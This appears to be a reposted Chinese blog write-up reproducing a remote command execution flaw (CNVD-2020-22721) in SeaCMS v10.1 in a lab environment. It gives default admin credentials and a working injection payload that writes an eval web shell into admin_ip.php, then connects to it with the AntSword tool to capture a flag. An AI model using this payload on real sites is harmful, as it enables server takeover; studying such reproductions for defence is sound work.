SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)
漏洞信息
- seacms_v10.1有效
- cnvd-2020-22721
- 命令執(zhí)行漏洞
描述
海洋CMS一套程序自適應(yīng)電腦、手機(jī)、平板、APP多個(gè)終端入口。 SeaCMS v10.1存在命令執(zhí)行漏洞,在w1aqhp/admin_ip.php下第五行使用set參數(shù),對用戶輸入沒有進(jìn)行任何處理,直接寫入文件。攻擊者可利用該漏洞執(zhí)行惡意代碼,獲取服務(wù)器權(quán)限。 后臺路徑:/manager 后臺密碼:admin:admin
前提
-
volfucs靶場復(fù)現(xiàn)
-
可以進(jìn)入后臺
復(fù)現(xiàn)過程
登錄進(jìn)入首頁
按照如圖順序訪問,點(diǎn)擊確認(rèn)時(shí)抓包
修改內(nèi)容
v=0&ip=127.0.0.1";eval($_POST[999]);//
網(wǎng)頁回顯正常沒有報(bào)錯(cuò)
嘗試蟻劍連接
ip安全設(shè)置選項(xiàng)位置為admin_ip.php
訪問也正常
嘗試蟻劍連接該位置
成功獲取flag文章來源:http://www.zghlxwxcb.cn/news/detail-718483.html
文章來源地址http://www.zghlxwxcb.cn/news/detail-718483.html
到了這里,關(guān)于漏洞復(fù)現(xiàn)-SeaCMS_v10.1_遠(yuǎn)程命令執(zhí)行(CNVD-2020-22721)的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!